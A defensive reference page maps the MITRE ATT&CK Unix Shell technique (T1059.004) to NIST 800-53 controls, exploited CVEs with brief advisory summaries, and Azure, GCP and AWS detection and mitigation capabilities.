Home
ATT&CK Techniques
T1059.004 Unix Shell

T1059.004 Unix Shell

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

View in MITRE ATT&CK®

NIST 800-53 Mappings

Capability ID	Capability Description	Mapping Type	ATT&CK ID	ATT&CK Name
CM-06	Configuration Settings	mitigates	T1059.004	Unix Shell
AC-17	Remote Access	mitigates	T1059.004	Unix Shell
SI-16	Memory Protection	mitigates	T1059.004	Unix Shell
SI-10	Information Input Validation	mitigates	T1059.004	Unix Shell
SI-03	Malicious Code Protection	mitigates	T1059.004	Unix Shell
SI-07	Software, Firmware, and Information Integrity	mitigates	T1059.004	Unix Shell
CM-02	Baseline Configuration	mitigates	T1059.004	Unix Shell
SI-04	System Monitoring	mitigates	T1059.004	Unix Shell
AC-02	Account Management	mitigates	T1059.004	Unix Shell
AC-03	Access Enforcement	mitigates	T1059.004	Unix Shell
AC-06	Least Privilege	mitigates	T1059.004	Unix Shell

Known Exploited Vulnerabilities Mappings

Capability ID	Capability Description	Mapping Type	ATT&CK ID	ATT&CK Name	Notes
CVE-2025-25257	Fortinet FortiWeb SQL Injection Vulnerability	primary_impact	T1059.004	Unix Shell	Comments Affected versions of FortiWeb contain insufficient input sanitization, allowing for an attacker to use SQL injection to write a malicious .pth file to the into FortiWeb's site-packages Python directory. This allows the malicious code to execute using the privileges granted to Python scripts in that high-level directory. Given the use of SQL, this can lead to potential loss of data within the database. References https://zeropath.com/blog/fortinet-fortiweb-cve-2025-25257-sql-injection-rce
CVE-2023-44221	SonicWall SMA100 Appliances OS Command Injection Vulnerability	primary_impact	T1059.004	Unix Shell	Comments This post-authentication command injection vulnerability is chained with CVE-2024-38475 to allow command execution as the nobody user, affecting versions below 10.2.1.10-62sv. References https://labs.watchtowr.com/sonicboom-from-stolen-tokens-to-remote-shells-sonicwall-sma100-cve-2023-44221-cve-2024-38475/
CVE-2023-39780	ASUS RT-AX55 Routers OS Command Injection Vulnerability	primary_impact	T1059.004	Unix Shell	Comments Attackers have gained access to affected ASUS routers by using brute-force login attempts and authentication bypasses, allowing them to inject and execute commands to enable SSH. Additionally, they can place a backdoor in the NVRAM. References https://www.greynoise.io/blog/stealthy-backdoor-campaign-affecting-asus-routers
CVE-2022-20700	Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability	primary_impact	T1059.004	Unix Shell	Comments This vulnerability is exploited by a remote attacker who sends specific commands to a Cisco router that does not have sufficient authorization enforcement mechanisms in place. This could allow the remote attacker to gain root privileges and execute arbitrary commands on the system. References https://www.tenable.com/blog/cve-2022-20699-cve-2022-20700-cve-2022-20708-critical-flaws-in-cisco-small-business-rv-series https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D
CVE-2022-20699	Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability	primary_impact	T1059.004	Unix Shell	Comments This vulnerability is exploited by a remote, unauthenticated attacker by "sending a specially crafted HTTP request to a vulnerable device that is acting as an SSL VPN Gateway.” This can be performed due to insufficient boundary checks when processing specific HTTP requests. If exploited, this could grant root privileges to the attacker. References https://www.tenable.com/blog/cve-2022-20699-cve-2022-20700-cve-2022-20708-critical-flaws-in-cisco-small-business-rv-series https://www.zerodayinitiative.com/advisories/ZDI-22-414/ https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D
CVE-2023-38831	RARLAB WinRAR Code Execution Vulnerability	primary_impact	T1059.004	Unix Shell	Comments CVE-2023-38831 is a vulnerability within the crafred archive process of WinRAR that occurs when a user attempts to open a seemingly legitimate document within a compromised archive, the vulnerability allows the attacker to execute arbitrary code on the system via a specially prepared archive. There have been public reports on the FROZENLAKE spear-phishing campaign, FROZENBARENTS, and ISLANDDREAMS leveraging this vulnerability. References https://cybersecuritynews.com/hacktivist-group-exploit-winrar-vulnerability/ https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ https://thehackernews.com/2024/09/hacktivists-exploits-winrar.html https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
CVE-2019-0708	Microsoft Remote Desktop Services Remote Code Execution Vulnerability	primary_impact	T1059.004	Unix Shell	Comments CVE-2019-0708, also known as BlueKeep, is a remote code execution vulnerability present in the Windows Remote Desktop Services. Blue Keep can enable remote unauthenticated attackers to run arbitrary code, or conduct denial of service attacks, as well as potentially take control of vulnerable systems. References https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-317a https://www.bleepingcomputer.com/news/security/bluekeep-scanner-discovered-in-watchbog-cryptomining-malware/
CVE-2014-7169	GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability	primary_impact	T1059.004	Unix Shell	Comments CVE-2014-7169 allows environment variables set from service/HTTP requests on a serve (e.g. HTTP_COOKIE) in Bash shell that allows for spawning a child shell with the authority/privilege level of the parent shell to perform RCE of code provided by the adversary in the request. References http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html
CVE-2014-6271	GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability	primary_impact	T1059.004	Unix Shell	Comments CVE-2014-6271 allows environment variables set from service/HTTP requests on a serve (e.g. HTTP_COOKIE) in Bash shell that allows for spawning a child shell with the authority/privilege level of the parent shell to perform RCE of code provided by the adversary in the request. References https://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html
CVE-2016-10033	PHPMailer Command Injection Vulnerability	primary_impact	T1059.004	Unix Shell	Comments References https://jp.broadcom.com/support/security-center/attacksignatures/detail?asid=29894 https://www.upguard.com/blog/cve-2016-10033-detection-and-response-guide
CVE-2024-24919	Check Point Quantum Security Gateways Information Disclosure Vulnerability	secondary_impact	T1059.004	Unix Shell	Comments CVE-2024-24919 is an information disclosure/arbitrary file read vulnerability within Check Point's Quantum Security Gateway products. It's been reported that attacker are leveraging this vulnerability to retrieve, all files on the local file system, read sensitive data and extract credentials for all local accounts, including Active Directory, SSH keys, and certificates. References https://www.greynoise.io/blog/whats-going-on-with-checkpoint-cve-2024-24919 https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ https://censys.com/cve-2024-24919/ https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/
CVE-2024-27443	Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability	primary_impact	T1059.004	Unix Shell	Comments Attackers can send a malicious email with a specially crafted calendar header in order to execute arbitrary JavaScript code in the browser References https://blackkite.com/blog/focus-friday-tprm-insights-into-zimbra-draytek-vigor-atlassian-jira-data-center-tornado-and-mdaemon-vulnerabilities/
CVE-2023-46604	Apache ActiveMQ Deserialization of Untrusted Data Vulnerability	primary_impact	T1059.004	Unix Shell	Comments This vulnerability is exploited by a remote attacker who manipulates serialized class types in the OpenWire protocol to run arbitrary shell commands. This allows the adversary to execute remote code, leading to the download and installation of malware, such as the Kinsing malware and cryptocurrency miners, on Linux systems. Additionally, attackers have attempted to deploy ransomware, attributed to the HelloKitty ransomware family, on target systems. References https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/ https://www.trendmicro.com/en_us/research/23/k/cve-2023-46604-exploited-by-kinsing.html
CVE-2021-36380	Sunhillo SureLine OS Command Injection Vulnerablity	primary_impact	T1059.004	Unix Shell	Comments To trigger this vulnerability, an attacker sends a specially crafted POST request to the webserver at the URL /cgi/networkDiag.cgi . Within this request, the attacker inserts a Linux command as part of the ipAddr or dnsAddr POST parameters. When the webserver processes the POST request, the command the attacker has inserted into the parameter will be executed. References https://blog.sonicwall.com/en-us/2023/11/sunhillo-sureline-command-injection-vulnerability/ https://www.bleepingcomputer.com/news/security/mirai-ddos-malware-variant-expands-targets-with-13-router-exploits/ https://www.recordedfuture.com/vulnerability-database/CVE-2021-36380 https://www.nccgroup.com/us/research-blog/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/

VERIS Mappings

Capability ID	Capability Description	Mapping Type	ATT&CK ID	ATT&CK Name	Notes
action.hacking.variety.Abuse of functionality	Abuse of functionality.	related-to	T1059.004	Unix Shell

Azure Mappings

Capability ID	Capability Description	Mapping Type	ATT&CK ID	ATT&CK Name	Notes
microsoft_sentinel	Microsoft Sentinel	technique_scores	T1059.004	Unix Shell	Comments The Microsoft Sentinel Hunting "Rare process running on a Linux host" query can identify uncommon shell usage that may be malicious. References https://learn.microsoft.com/en-us/azure/sentinel/overview https://learn.microsoft.com/en-us/azure/sentinel/hunting
alerts_for_linux_machines	Alerts for Linux Machines	technique_scores	T1059.004	Unix Shell	Comments This control may alert on suspicious commandline activity. Alerts may be generated on possible detection of shellcode usage on the commandline, based on arguments, location, user, etc. References https://learn.microsoft.com/en-us/azure/defender-for-cloud/alerts-reference#alerts-linux
defender_for_app_service	Microsoft Defender for Cloud: Defender for App Service	technique_scores	T1059.004	Unix Shell	Comments This control monitors host data for potential reverse shells used for command and control. Temporal factor is unknown. References https://learn.microsoft.com/en-us/azure/defender-for-cloud/defender-for-app-service-introduction

GCP Mappings

Capability ID	Capability Description	Mapping Type	ATT&CK ID	ATT&CK Name	Notes
security_command_center	Security Command Center	technique_scores	T1059.004	Unix Shell	Comments SCC uses machine learning [NLP techniques] to evaluate content of an executed bash script. This security solution protects against potentially malicious scripts that are used to execute commands in compromised systems. Because of the high threat detection coverage provided by the ML model and near-real time temporal factor this control was graded as significant. References ['https://cloud.google.com/security-command-center/docs/concepts-security-command-center-overview' 'https://github.com/GoogleCloudPlatform/security-analytics']

AWS Mappings

Capability ID	Capability Description	Mapping Type	ATT&CK ID	ATT&CK Name	Notes
aws_web_application_firewall	AWS Web Application Firewall	technique_scores	T1059.004	Unix Shell	Comments The AWS WAF protects web applications from injection attacks that leverage command and scripting interpreters. AWS WAF provides this protection via the following rule sets that block malicious traffic across a variety of operating systems and applications. AWSManagedRulesCommonRuleSet AWSManagedRulesSQLiRuleSet AWSManagedRulesUnixRuleSet AWSManagedRulesWindowsRuleSet AWSManagedRulesPHPRuleSet AWSManagedRulesWordPressRuleSet This is given a score of Significant because it provides protections for PowerShell, Unix, and JavaScript command and scripting interpreters by blocking the malicious content in near real-time. References